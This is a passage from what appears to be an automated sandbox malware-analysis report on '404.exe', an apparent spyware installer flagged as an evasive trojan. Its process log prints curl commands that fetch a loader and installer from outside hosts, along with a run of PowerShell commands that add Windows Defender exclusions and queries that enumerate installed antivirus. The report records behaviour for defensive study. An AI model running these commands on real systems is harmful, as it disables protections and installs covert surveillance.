            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_00259D1065_2_00259D10
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0023A13265_2_0023A132
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_00231F1065_2_00231F10
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_00246F9065_2_00246F90
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 71_3_029E15F371_3_029E15F3
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: String function: 033C565C appears 36 times
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: String function: 00233850 appears 34 times
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: String function: 00243380 appears 48 times
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: String function: 00266FB0 appears 191 times
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: String function: 00243610 appears 43 times
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: String function: 004BD1E8 appears 58 times
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: String function: 00239DB0 appears 70 times
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: String function: 00267140 appears 140 times
            Source: 404.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: 404.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-83S41.tmp.13.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: is-83S41.tmp.13.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-F1LPA.tmp.13.drStatic PE information: Resource name: RT_BITMAP type: DOS executable (COM)
            Source: is-F1LPA.tmp.13.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
            Source: is-F1LPA.tmp.13.drStatic PE information: Resource name: RT_RCDATA type: COM executable for DOS
            Source: is-F1LPA.tmp.13.drStatic PE information: Number of sections : 13 > 10
            Source: ffws.exe.51.drStatic PE information: Number of sections : 11 > 10
            Source: is-DN3K6.tmp.13.drStatic PE information: Number of sections : 18 > 10
            Source: is-KK513.tmp.13.drStatic PE information: Number of sections : 11 > 10
            Source: is-A63B5.tmp.13.drStatic PE information: Number of sections : 13 > 10
            Source: 404.exe, 00000000.00000000.1309401583.0000000000148000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesfk.exe4 vs 404.exe
            Source: 404.exe, 00000000.00000002.1647791601.000000000067E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 404.exe
            Source: 404.exe, 0000000C.00000003.1712556211.000000007FE3C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 404.exe
            Source: 404.exe, 0000000C.00000003.1712113818.00000000024A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 404.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"
            Source: 404.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: is-A63B5.tmp.13.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
            Source: is-F1LPA.tmp.13.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
            Source: is-A63B5.tmp.13.drStatic PE information: Section: ZLIB complexity 1.0016526442307692
            Source: is-A63B5.tmp.13.drStatic PE information: Section: ZLIB complexity 1.0005696614583333
            Source: is-A63B5.tmp.13.drStatic PE information: Section: ZLIB complexity 1.0007161458333333
            Source: is-A63B5.tmp.13.drStatic PE information: Section: ZLIB complexity 1.021484375
            Source: is-A63B5.tmp.13.drStatic PE information: Section: ZLIB complexity 1.0003823138297872
            Source: is-F1LPA.tmp.13.drStatic PE information: Section: ZLIB complexity 1.0017903645833333
            Source: is-F1LPA.tmp.13.drStatic PE information: Section: ZLIB complexity 1.0005696614583333
            Source: is-F1LPA.tmp.13.drStatic PE information: Section: ZLIB complexity 1.0008680555555556
            Source: is-F1LPA.tmp.13.drStatic PE information: Section: ZLIB complexity 1.021484375
            Source: is-F1LPA.tmp.13.drStatic PE information: Section: ZLIB complexity 1.0003551136363635
            Source: 404.exe, Settings.csBase64 encoded string: 'HUXwGsL2qA2Klp4GxVUBZj53IhCCt8FRahOgIF5wxEYiSEtN7bkJKWuhYdnhpIJq4ktEaX6sYgMULWkDwyERY4HDwqInaXGo4qnrUpvjd0tmKZWB2ku0E0SAcqRtPSSAZhZds1rHDewgKe2WTGuymPkDYmPnYBULitMlA1SA1nwjEuy7w3ZIhcXK5WFFmErCKl6aRQWbxu58cB8mxRzdkLmFVComwNWx4uYcxYpgh7TwfXq4XbRVOOa770EPksojXIErlfyYkT4l1zj6UtPU5BjpTad5Ua4yTsYXT8S0m1u3SyGHRG30dTnWiXXLC1DKYGSIbLnVaXrDQoWeUWnNfEU8FCy5lHytxjfMf7pGciZFljG2A20pOznTuSCYWqtSi6OpJK7Vqhu6nOXe445rQJf74LaN4QsuyHgnVZsz3e8pEqpg4hcauBCZbQu7suaZxAHgrtJfMFxvKy3Ne3SXwS8xEGLFouGJDi0EiJyLX6OoNQPlVgcybDmfATbkhEza8nrk7znVFH8yETkx0isISQqA4VDPrNmTHwpihnnf1HtUEwaqsms7VrHs6rolwYm0dorQnBPM3MPLfW4I3VfEeo7Yp5lz8Bsdd20YFKCqWfDIb5Mjvgra1iWypSkqZYN2dvqmffCsSyq7kz6ttBEbTRk4gBsvjUR7RKnoOiEPd8HD0XNzUz6XUviLLvGdwPJ6gspaLReK5y6UJhEIx1asX2nfkcdbckbNzKgHrwoDVwbexOBmr6p4xZjmFJyswCqUXsd8A5aBNXXjbIqVaztf4fZZj2Bh65PSGGHFtClugnraBAL5ccR6RKZ0TEZH42DQIEdUBlkXN88Qx8XjqEFdnSA4qPupmezmkaR5gz4z03sSLIDUpyZzwimzEhnvz4usJVpWqaD0JOltjrsiLaAwE8zBwb17MJA5I8IzcqmOviqi62QVxFjZ37oKfniPiFnAOokjj2FewuBeSRE3KfJHijBJU7TxHXoq4pTRRpv48ElI6J0OioEC4gannaPkiQXYGTil6wlesOHd71MKGFPbTmuYOonzaLVrqMCmjOQvDjSqY6puOEdcB5FchKWRJuDh1Zvuzij0ycXtTEAR82lVq1puGiEZ17mSfux8K34oemnihVJdKFSQIq0AsBnQdK8zzFNhQAHE760EOHNuZkOvpWJy'
            Source: classification engineClassification label: mal52.troj.evad.winEXE@142/1037@15/9
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0024A2A0 GetLastError,_errno,strncpy,FormatMessageA,strrchr,strrchr,_errno,_errno,GetLastError,SetLastError,65_2_0024A2A0
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A7898 GetDiskFreeSpaceA,51_2_033A7898
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_00233700 memset,GetLastError,CreateToolhelp32Snapshot,GetLastError,Module32First,Module32Next,CloseHandle,65_2_00233700
            Source: C:\Users\user\Desktop\404.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\404.exe.logJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4360:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1588:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
            Source: C:\Users\user\Desktop\404.exeFile created: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87Jump to behavior
            Source: Yara matchFile source: 73.0.spmm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000049.00000000.3114492355.0000000000401000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BG5BA.tmp, type: DROPPED
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
            Source: 404.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: 404.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cmd.exe&quot; OR Caption = &quot;wlg.exe&quot; OR Caption = &quot;spmm.exe&quot; OR Caption = &quot;spkl.exe&quot; OR Caption = &quot;spm.exe&quot; OR Caption = &quot;sem.exe&quot; OR Caption = &quot;clv.exe&quot; OR Caption = &quot;akl.exe&quot; OR Caption = &quot;sps.exe&quot; OR Caption = &quot;sime64.exe&quot; OR Caption = &quot;ff.exe&quot; OR Caption = &quot;mrec.exe&quot; OR Caption = &quot;clvhost.exe&quot; OR Caption = &quot;ffws.exe&quot;)
            Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cmd.exe&quot; OR Caption = &quot;wlg.exe&quot; OR Caption = &quot;spmm.exe&quot; OR Caption = &quot;spkl.exe&quot; OR Caption = &quot;spm.exe&quot; OR Caption = &quot;sem.exe&quot; OR Caption = &quot;clv.exe&quot; OR Caption = &quot;akl.exe&quot; OR Caption = &quot;sps.exe&quot; OR Caption = &quot;sime64.exe&quot; OR Caption = &quot;ff.exe&quot; OR Caption = &quot;mrec.exe&quot; OR Caption = &quot;clvhost.exe&quot; OR Caption = &quot;ffws.exe&quot;)
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SPM.EXE&apos;
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\404.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
            Source: spkl.exe, 00000033.00000003.3150998279.0000000006ECF000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3247512604.0000000004BF6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE if not exists `wlog` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,`sTime`TEXT,`sJSon`TEXT);
            Source: spkl.exe, 00000033.00000002.3231347372.00000000018C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE if not exists `wlog` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,`sTime`TEXT,`sJSon`TEXT);0.mca"
            Source: 404.exeReversingLabs: Detection: 76%
            Source: 404.exeVirustotal: Detection: 75%
            Source: spkl.exeString found in binary or memory: NATS-SEFI-ADD
            Source: spkl.exeString found in binary or memory: NATS-DANO-ADD
            Source: spkl.exeString found in binary or memory: JIS_C6229-1984-b-add
            Source: spkl.exeString found in binary or memory: jp-ocr-b-add
            Source: spkl.exeString found in binary or memory: JIS_C6229-1984-hand-add
            Source: spkl.exeString found in binary or memory: jp-ocr-hand-add
            Source: spkl.exeString found in binary or memory: ISO_6937-2-add
            Source: qrl.exeString found in binary or memory: Unable to complete request for channel-process-startup
            Source: qrl.exeString found in binary or memory: dns-ipv4-addr
            Source: qrl.exeString found in binary or memory: dns-ipv6-addr
            Source: qrl.exeString found in binary or memory: false-start
            Source: qrl.exeString found in binary or memory: --dns-ipv4-addr <address>
            Source: qrl.exeString found in binary or memory: --dns-ipv6-addr <address>
            Source: qrl.exeString found in binary or memory: --false-start
            Source: qrl.exeString found in binary or memory: -h, --help
            Source: qrl.exeString found in binary or memory: -h, --help
            Source: qrl.exeString found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
            Source: qrl.exeString found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
            Source: qrl.exeString found in binary or memory: id-cmc-addExtensions
            Source: qrl.exeString found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
            Source: qrl.exeString found in binary or memory: set-addPolicy
            Source: qrl.exeString found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
            Source: qrl.exeString found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
            Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeFile read: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\404.exe "C:\Users\user\Desktop\404.exe"
            Source: C:\Users\user\Desktop\404.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"
            Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp "C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\pswd.cmd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '404.*'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
